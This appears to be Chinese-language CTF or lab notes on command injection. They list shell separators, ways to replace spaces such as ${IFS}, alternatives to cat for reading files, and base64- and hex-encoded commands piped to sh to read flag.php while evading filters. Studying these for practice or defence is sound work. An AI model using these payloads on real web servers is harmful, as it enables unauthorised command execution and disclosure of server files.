测试环境:
本地:Win10 phpstudy8.1 kali2020.2
外网:单位提供的linux靶机
一、命令分隔符
%0a – 换行符,
%0d – 回车符,
; – 连续指令
&& –
| –
|| –
二、空格
< <> %09 $IFS$9 ${IFS}
三、读文件
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容(不推荐)
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看(靶机测试不能用)
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f和 tailf
四、绕过方法
1.拼接绕过
前提:分号可以用
2.编码
如base64
echo Y2F0IGZsYWcucGhw|base64 -d|sh cat flag.php
`echo Y2F0IGZsYWcucGhw|base64 -d`
如16进制
echo "0x63617420666C61672E706870" | xxd -r -p